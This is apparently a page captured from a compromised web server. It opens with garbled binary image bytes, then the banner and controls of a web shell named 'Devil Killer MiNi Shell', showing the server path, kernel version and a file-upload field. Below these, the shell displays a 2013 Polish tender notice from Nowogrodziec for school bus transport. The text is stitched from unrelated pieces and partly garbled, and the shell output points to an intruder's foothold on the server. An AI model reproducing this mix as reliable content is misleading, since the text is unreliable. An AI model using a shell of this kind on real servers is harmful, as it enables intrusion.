JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130801/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130801/308130-N-2013.html

<p class="kh_header"><b>Nowogrodziec: DOWÓZ UCZNIÓW DO JEDNOSTEK OŚWIATOWYCH W ROKU SZKOLNYM 2013/2014 Z PODZIAŁEM NA DWA ZADANIA</b><br>
<b>Numer ogłoszenia: 308130 - 2013; data zamieszczenia: 01.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina i Miasto Nowogrodziec , ul. Rynek 1, 59-730 Nowogrodziec, woj. dolnośląskie, tel. 75 7380660, faks 75 7316416.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.nowogrodziec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOWÓZ UCZNIÓW DO JEDNOSTEK OŚWIATOWYCH W ROKU SZKOLNYM 2013/2014 Z PODZIAŁEM NA DWA ZADANIA.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Nazwa zadania: Dowóz uczniów do jednostek oświatowych w roku szkolnym 2013/2014 z podziałem na dwa zadania w dni robocze z wyjątkiem sobót, świąt i innych dni ustawowo wolnych od pracy, także przerw w realizacji zajęć dydaktyczno - wychowawczych, określonych  na podstawie przepisów rozporządzenia Ministra Edukacji Narodowej i Sportu 
z dnia 18 kwietnia 2002 roku w sprawie organizacji roku szkolnego (Dz. U. z 2002 r., Nr 46, poz. 432 ze zm.).

Zadanie nr 1 - Dowóz uczniów do szkół podstawowych i gimnazjów z terenu Gminy Nowogrodziec:

1. Szkoła Podstawowa im. Bolesława Chrobrego w Nowogrodźcu:
Relacja przejazdu:
1) Godzieszów stacja paliw (kierunek Bolesławiec) - Nowogrodziec ul. Krótka, Ilość uczniów 1, Planowana liczba kursów: Dowóz 1 (godz. 8:00), Odwóz 1 (godz. 13:15)*;
2) Gościszów Zelczów - Nowogrodziec, ul. Krótka, Ilość uczniów 1, Planowana liczba kursów: Dowóz 1 (godz. 8:00), Odwóz 2  (godz. 13:15, 14.10)*
3) Milików ul. Kolonia - Nowogrodziec ul. Krótka, Ilość uczniów 3, Planowana liczba kursów: Dowóz 1 (godz. 8:00), Odwóz 3  (godz. 13:15, 14.10, 15.00)*
4) Nowogrodziec, ul. Nowogrodzka (kierunek Nowogrodziec) - Nowogrodziec ul. Krótka, Ilość uczniów 11, Planowana liczba kursów: Dowóz 1 (godz. 8:00), Odwóz 3  (godz. 13:15, 14.10, 15.00)*
5) Parzyce szkoła - Nowogrodziec, ul. Krótka, Ilość uczniów 29, Planowana liczba kursów: Dowóz 1 (godz. 8:00), Odwóz 3  (godz. 13:15, 14.10, 15.00)*
6) Zabłocie - Nowogrodziec ul Krótka, Ilość uczniów 17 w tym: Zabłocie (kierunek Nowogrodziec) 5 uczniów oraz Zabłocie kurniki 12 uczniów, Planowana liczba kursów: Dowóz 1 (godz. 8:00), Odwóz 3  (godz. 13:15, 14.10, 15.00)*
7) Zebrzydowa droga krajowa 94 (remiza OSP) - Nowogrodziec ul Krótka, Ilość uczniów 19, Planowana liczba kursów: Dowóz 1 (godz. 8:00), Odwóz 3  (godz. 13:15, 14.10, 15.00)*

*podane godziny oznaczają godziny rozpoczęcia i zakończenia zajęć lekcyjnych w szkole

2. Gimnazjum im. Adama Mickiewicza w Nowogrodźcu:
Relacja przejazdu:
1) Godzieszów stacja paliw (kierunek Bolesławiec) - Nowogrodziec ul. Krótka, Ilość uczniów 2, Planowana liczba kursów: Dowóz 2 (godz. 8:00, 8.50), Odwóz 3  (godz. 13:15, 14.10, 15.00)*
2) Gościszów - Nowogrodziec, ul. Krótka, Ilość uczniów 53 w tym: Gościszów Zelczów 
3 uczniów, Gościszów przy posesji  nr 233 6 uczniów, Gościszów kościół 19 uczniów, Gościszów przy posesji nr 9 - 9 uczniów, Gościszów  tartak 5 uczniów, Gościszów skrzyżowanie 11 uczniów, Planowana liczba kursów: Dowóz 2 (godz. 8:00, 8.50), Odwóz 3  (godz. 13:15, 14.10, 15.00)*
3) Czerna (kierunek Bolesławiec) -  Nowogrodziec, ul. Krótka, Ilość uczniów 24, Planowana liczba kursów: Dowóz 2 (godz. 8:00, 8.50), Odwóz 3  (godz. 13:15, 14.10, 15.00)*
4) Gierałtów - Nowogrodziec, ul. Krótka, Ilość uczniów 51 w tym: Gierałtów kościół 45 uczniów, Gierałtów stacja PKP 6 uczniów, Planowana liczba kursów: Dowóz 2 (godz. 8:00, 8.50), Odwóz 3  (godz. 13:15, 14.10, 15.00)*
5) Parzyce kierunek Zebrzydowa  - Nowogrodziec, ul. Krótka, Ilość uczniów 16, Planowana liczba kursów: Dowóz 2 (godz. 8:00, 8.50), Odwóz 3  (godz. 13:15, 14.10, 15.00)*
6) Zabłocie (kierunek Nowogrodziec) - Nowogrodziec ul Krótka, Ilość uczniów 7, Planowana liczba kursów: Dowóz 2 (godz. 8:00, 8.50), Odwóz 3  (godz. 13:15, 14.10, 15.00)*
7) Zebrzydowa droga krajowa 94 (remiza OSP) - Nowogrodziec ul Krótka, Ilość uczniów 13, Planowana liczba kursów: Dowóz 2 (godz. 8:00, 8.50), Odwóz 3  (godz. 13:15, 14.10, 15.00)*
8) Wykroty ul. 22 Lipca Wiejski Dom Kultury - Nowogrodziec, ul. Krótka, Ilość uczniów 2, Planowana liczba kursów: Dowóz 2 (godz. 8:00, 8.50), Odwóz 3  (godz. 13:15, 14.10, 15.00)*

*podane godziny oznaczają godziny rozpoczęcia i zakończenia zajęć lekcyjnych w szkole

3. Przedszkole Publiczne w Nowogrodźcu

1) Milików mostek - Nowogrodziec ul. Krótka, Ilość uczniów 3, Planowana liczba kursów: Dowóz  (godz. 8:00), Odwóz   (godz. 13:00)*
2) Gościszów Zelczów - Nowogrodziec, ul. Krótka, Ilość uczniów 2, Planowana liczba kursów: Dowóz  (godz. 8:00), Odwóz   (godz. 13:00)*
3) Milików ul. Kolonia - Nowogrodziec ul. Krótka, Ilość uczniów 2, Planowana liczba kursów: Dowóz  (godz. 8:00), Odwóz   (godz. 13:00)*
4) Parzyce szkoła - Nowogrodziec, ul. Krótka, Ilość uczniów 6, Planowana liczba kursów: Dowóz  (godz. 8:00), Odwóz   (godz. 13:00)*
5) Zabłocie - Nowogrodziec ul Krótka, Ilość uczniów 8 w tym: Zabłocie (kierunek Nowogrodziec) 4 uczniów, Zabłocie kurniki 4 uczniów, Planowana liczba kursów: Dowóz  (godz. 8:00), Odwóz   (godz. 13:00)*

*podane godziny oznaczają godziny rozpoczęcia i zakończenia zajęć lekcyjnych w szkole


4. Zespół Szkół im. Józefa Piłsudskiego w Nowej Wsi:
Relacja przejazdu:
1. Czerna - Nowa Wieś Zebrzydowska, Ilość uczniów 10, w tym: Czerna BZMO (kierunek Bolesławiec) 1 uczeń oraz  Czerna (kierunek Bolesławiec) 9 uczniów, Planowana liczba kursów: Dowóz 1 (godz. 8:00), Odwóz 2 (godz. 13:45, 14:35)*;
2. Parzyce kierunek Zebrzydowa - Nowa Wieś Zebrzydowska, Ilość uczniów 8, Planowana liczba kursów: Dowóz 1 (godz. 8:00), Odwóz 1 (godz. 13:15)*;
3. Zebrzydowa droga krajowa 94 (remiza OSP) - Nowa Wieś Zebrzydowska, Ilość uczniów 18, Planowana liczba kursów: Dowóz 1 (godz. 8:00), Odwóz 2 (godz. 13:45, 14:35)*;
4. Nowa Wieś Kolonia Bieniec - Nowa Wieś Zebrzydowska, Ilość uczniów 14, Planowana liczba kursów: Dowóz 1 (godz. 8:00), Odwóz 2 (godz. 13:00)*;
5. Kierżno autostrada - Nowa Wieś Zebrzydowska, Ilość uczniów 3, Planowana liczba kursów: Dowóz 1 (godz. 8:00), Odwóz 1 (godz. 13:15)*;

5. Szkoła Podstawowa im. Tadeusza Kościuszki w Wykrotach

Relacja przejazdu:
1. Gierałtów stacja PKP - Wykroty ul. 22 Lipca Gimnazjum, Ilość uczniów 3, Planowana liczba kursów: Dowóz 1 (godz. 8:00), Odwóz 1 (godz. 13:30)*;
2. Godzieszów stacja paliw (kierunek Bolesławiec)  Wykroty ul. 22 Lipca Gimnazjum, Ilość uczniów 3, Planowana liczba kursów: Dowóz 1 (godz. 8:00), Odwóz 2 (godz. 13:30,14:30)*;
3. Wykroty ul. 22 Lipca za skrzyżowaniem - Wykroty ul. 22 Lipca Gimnazjum, Ilość uczniów 7, Planowana liczba kursów: Dowóz 1 (godz. 8:00), Odwóz 2 (godz. 13:30,14:30)*;
4. Wykroty ul. 22 Lipca Wiejski Dom Kultury - Wykroty ul. 22 Lipca Gimnazjum, Ilość uczniów 10, Planowana liczba kursów: Dowóz 1 (godz. 8:00), Odwóz 2 (godz. 13:30,14:30)*;

*podane godziny oznaczają godziny rozpoczęcia i zakończenia zajęć lekcyjnych w szkole

6. Gimnazjum im. Ireny Sendler w Wykrotach:
Relacja przejazdu:
1. Godzieszów stacja paliw (kierunek Bolesławiec) - Wykroty ul. 22 Lipca Gimnazjum, Ilość uczniów 1, Planowana liczba kursów: Dowóz 1 (godz. 8:00), Odwóz 2 (godz. 13:35, 14:30)*;
2. Godzieszów sklep - Wykroty ul. 22 Lipca Gimnazjum, Ilość uczniów 2, Planowana liczba kursów: Dowóz 1 (godz. 8:00), Odwóz 2 (godz. 13:35, 14:30)*;
3. Wykroty ul. 22 Lipca za skrzyżowaniem - Wykroty ul. 22 Lipca Gimnazjum, Ilość uczniów 2, Planowana liczba kursów: Dowóz 1 (godz. 8:00), Odwóz 2 (godz. 13:35, 14:30)*;
4. Wykroty ul. 22 Lipca Wiejski Dom Kultury - Wykroty ul. 22 Lipca Gimnazjum. Ilość uczniów 1, Planowana liczba kursów: Dowóz 1 (godz. 8:00), Odwóz 2 (godz. 13:35, 14:30)*;
5. Wykroty ul. Rondo Jeleniów - Wykroty ul. 22 Lipca Gimnazjum, Ilość uczniów 1, Planowana liczba kursów: Dowóz 1 (godz. 8:00), Odwóz 2 (godz. 13:35, 14:30)*;

*podane godziny oznaczają godziny rozpoczęcia i zakończenia zajęć lekcyjnych w szkole

 7. Szkoła Podstawowa w Gościszowie:
Relacja przejazdu:
1. Mściszów - Gościszów kościół, Ilość uczniów 5, Planowana liczba kursów: Dowóz 1 (godz. 8:00), Odwóz 2 (godz. 11.35, 14:00)*;
2. Gościszów skrzyżowanie - Gościszów kościół, Ilość uczniów 22, Planowana liczba kursów: Dowóz 1 (godz. 8:00), Odwóz 2 (godz. 12:20, 14:00)*;
3. Gościszów Zelczów - Gościszów kościół, Ilość uczniów 8, Planowana liczba kursów: Dowóz 1 (godz. 8:00), Odwóz 2 (godz. 13:10, 14:00)*;

*podane godziny oznaczają godziny rozpoczęcia i zakończenia zajęć lekcyjnych w szkole

8. Szkoła Podstawowa w Czernej:
Relacja przejazdu:
1. Godzieszów sklep - Czerna (kierunek Bolesławiec), Ilość uczniów 1, Planowana liczba kursów: Dowóz 1 (godz. 8:00), Odwóz 1 (godz. 13:00)*;

*podane godziny oznaczają godziny rozpoczęcia i zakończenia zajęć lekcyjnych w szkole

9. Szkoła Podstawowa w Gierałtowie
Relacja przejazdu:
1. Gierałtów stacja PKP - Gierałtów kościół, Ilość uczniów 1, Planowana liczba kursów: Dowóz 1 (godz. 8:00), Odwóz 1 (godz. 13:30)*;

*podane godziny oznaczają godziny rozpoczęcia i zakończenia zajęć lekcyjnych w szkole
Kursy ranne - dowóz uczniów do poszczególnych szkół podstawowych i gimnazjów na godzinę 8.00 oraz 8.50. Kursy powrotne - odwóz uczniów z poszczególnych szkół podstawowych i gimnazjum w godzinach od 12.00 do 15.00. 
Kursy popołudniowe należy uzgodnić z Dyrektorem Szkoły Podstawowej / Gimnazjum jednakże pierwszy kurs odbywa się między godz. 12.00 a 13.30, drugi kurs między godz. 13.30 a 15.00. W przypadku Gimnazjum im. Adama Mickiewicza w Nowogrodźcu oraz Szkoły Podstawowej im. Bolesława Chrobrego w Nowogrodźcu należy uwzględnić kurs między godziną 15.00 a 16.00.
W przypadku zmiany organizacji zajęć polegającej na:
a)  skróceniu godzin nauki, sprawdzianu klas szóstych, egzaminu gimnazjalnego;
b) odpracowaniu zajęć z dnia wypadającego pomiędzy dwoma dniami świątecznymi ustawowo wolnymi od pracy lub piątku wypadającego bezpośrednio po dniu świątecznym ustawowo wolnym od pracy w sobotę lub z innych przyczyn, Wykonawca zostanie powiadomiony przez szkołę o zmianie terminu dowozu lub odwozu uczniów.
Wykonawca usługi ma zapewnić punktualny, bezpieczny, sprawny i bezawaryjny dowóz i odwóz uczniów wg ustalonego rozkładu jazdy autobusów/busów. 
Zamawiający dopuszcza możliwość zorganizowania przewozu uczniów w połączeniu z przewozami otwartymi.
Wykonawca będzie co miesiąc wystawiał dla uczniów i opiekunów imienny dokument potwierdzający prawo do skorzystanie z określonego dowozu z uwzględnieniem ulg ustawowych przewidzianych w przepisach ustawy o uprawnieniach do ulgowych przejazdów środkami publicznego transportu zbiorowego (Dz. U. z 2012r., poz. 1138). Na podstawie art. 11 ust 2. Ustawy z dnia 7 września 199 roku o systemie oświaty (Dz. U z 2004r., Nr 256, poz. 2572 ze zm.) oraz Rozporządzenia  Ministra Edukacji Narodowej z dnia 28 maja 2010 roku w sprawie świadectw, dyplomów państwowych i innych druków szkolnych (Dz. U. z 7 czerwca 2010r, Nr 97, poz. 624) dokumentem uprawniającym do ulg są legitymacja szkolna oraz zaświadczenie o spełnianiu obowiązku rocznego przygotowania przedszkolnego. 
Autobusy/busy Wykonawcy muszą być oznakowane, zgodnie z odrębnymi przepisami, tablicą informacyjną, iż przewożone są dzieci. Niedopuszczalne jest, aby w autobusie jechała większa liczba dzieci niż miejsc przeznaczonych dla pasażerów (według dowodu rejestracyjnego pojazdu). 
Wykonawca gwarantuje, iż w sytuacji awaryjnej na własny koszt zabezpieczy zastępczy środek transportu, w sposób zapewniający dowóz uczniów do szkół 
w wyznaczonym czasie.
Ustalona długość tras, wykaz i ilość kursów, przystanki,  miejscowości oraz ilość dzieci może ulec zmianie w zależności od zatwierdzonego rozkładu zajęć lekcyjnych w szkołach. W zależności od tego zmianie ulegać będzie wynagrodzenie Wykonawcy.


Zadanie nr 2 - Dowóz uczniów do Powiatowego Zespołu Szkół i Placówek Specjalnych w Bolesławcu


Przedmiotem zamówienia jest dowóz dzieci niepełnosprawnych umysłowo i ruchowo (1 osoba na wózku inwalidzkim) wraz z zapewnieniem opieki z miejsca zamieszkania do Powiatowego Zespołu Szkół i Placówek Specjalnych w Bolesławcu, ul. Zgorzelecka z następujących miejscowości:
1) Wykroty - 1 osoba;
2) Czerna - 1 osoba;
3) Parzyce - 2 osoby;
4) Nowogrodziec - 5 osób (w tym jedna osoba na wózku inwalidzkim);
5) Milików - 2 osoby.
Ostateczna liczba dzieci zostanie podana Wykonawcy pod koniec sierpnia, gdy Gmina uzyska listę dzieci uczęszczających do PZSiPS w Bolesławcu. Wówczas zatwierdzona zostanie także ostateczna trasa przejazdu oraz rozkład jazdy.
Dzieci będą dowożone codziennie od poniedziałku do piątku. Wykonawca zapewni także dowóz w przypadku odpracowywania przez szkołę w sobotę zajęć z dnia wypadającego pomiędzy dwoma dniami świątecznymi ustawowo wolnymi od pracy lub piątku wypadającego bezpośrednio po dniu świątecznym ustawowo wolnym od pracy po uprzednim zleceniu Zamawiającego.
 
Dzieci będą zabierane z miejscowości, w której mieszkają,  z przystanków ustalonych po uzgodnieniu optymalnej trasy przejazdu. Dziecko poruszające się na wózku należy odebrać z miejsca zamieszkania spod domu. W przypadku dzieci zamieszkałych w Parzycach należy uwzględnić przejazd przez całe Parzyce od przystanku Parzyce (kierunek Bolesławiec) drogą do Nowogrodźca (wjazd do Nowogrodźca od ulicy Młyńskiej) lub odwrotnie i odbiór jednego z dzieci spod domu. Długość trasy liczona jest od pierwszego przystanku (miejsca wsiadania pierwszego dziecka) do docelowej placówki oświatowej.

Dzieci należy dowieźć na godzinę 8 rano, godzina odwozu zostanie ustalona na początku roku szkolnego po uzyskaniu ich rozkładu zajęć w ośrodku. Zamawiający dopuszcza możliwość zmiany godziny odjazdu busa/autobusu z Bolesławca w poszczególne dni, w przypadku, gdy zajęcia w danym dniu trwają krócej lub, gdy wynika to z rozkładu zajęć dzieci.
Z uwagi na dziecko poruszające się na wózku, Wykonawca zobowiązany jest do zapewnienia busa/autobusu dostosowanego do przewozu osób niepełnosprawnych. Pojazd powinien być wyposażony w odpowiedni, atestowany sprzęt, ułatwiający wsiadanie i wysiadanie dzieci poruszających się na wózku (np. winda lub podjazd) oraz odpowiednie zabezpieczenie dla przewozu dzieci i wózków, np. pasy do przypinania dzieci znajdujących się na wózkach.
Wykonawca zapewni bezpieczeństwo, bezawaryjność i punktualność dowozu,  
a w sytuacjach awaryjnych zapewni transport zastępczy odpowiadający wymogom opisanym w punkcie 4.2.6.
Wykonawca odpowiada za opiekę i bezpieczeństwo dzieci w czasie przewozu 
do i z PZSiPS w Bolesławcu oraz w drodze z pojazdu do budynku placówki oświatowej oraz w drodze z budynku placówki oświatowej do pojazdu. Opiekę nad dziećmi może sprawować osoba pełnoletnia dająca rękojmię bezpiecznego dojazdu dzieci do placówki oświatowej. Obowiązki opiekuna reguluje umowa..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje zamówienia uzupełniające w kwocie nieprzekraczającej 16% wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.11.20.00-6, 60.11.34.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 27.06.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli Wykonawcy wykażą, iż: posiadają aktualne uprawnienia do wykonywania działalności polegającej na przewozie osób tj. na podstawie art. 7 ust. 2 pkt 1 ustawy z dnia 6 września 2001 roku o transporcie drogowym (Dz. U. z 2012r., poz. 1265) uzyskali licencję na wykonywanie krajowego transportu drogowego osób - dla obu zadań;
W przypadku zadania nr 1, Wykonawca na dzień podpisania umowy lub najpóźniej do 30 sierpnia 2013r. musi dysponować zezwoleniem na wykonywanie regularnych przewozów osób w krajowym transporcie drogowym na trasach opisanych w SIWZ oraz okazać je do wglądu na żądanie Zamawiającego.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli Wykonawca złoży wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, należycie wykonał min. jedną usługę porównywalną z przedmiotem niniejszego przetargu (jako usługę porównywalną uważa się wykonanie minimum jednej usługi codziennego dowozu, przewozu osób przez minimum 6 miesięcy o wartości minimalnej jednej usługi brutto 70.000 zł dla zadania nr 1 oraz o wartości minimalnej jednej usługi brutto 25.000 zł dla zadania nr 2) wraz z dowodami potwierdzającymi wykonanie tej usługi 
z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli Wykonawca złoży wykaz potencjału technicznego dostępnego wykonawcy w celu realizacji zamówienia. W przypadku zadania nr 1 wykonawca musi zapewnić pojazd z odpowiednią liczbą miejsc siedzących  - odpowiednio do danej trasy. W przypadku zadania nr 2 Wykonawca musi dysponować pojazdem przystosowanym do przewozu 1 osoby na wózku inwalidzkim oraz min. 14 osób na miejscach siedzących.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli Wykonawca złoży oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania (dla obu zadań)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli Wykonawca wykaże, iż posiada opłaconą polisę ubezpieczeniową na kwotę nie mniejszą niż 200.000 zł dla zadania nr 1 oraz nie mniej niż 30.000 zł dla zadania nr 2, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniania będzie ich łączna sytuacja  ekonomiczna i finansowa).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

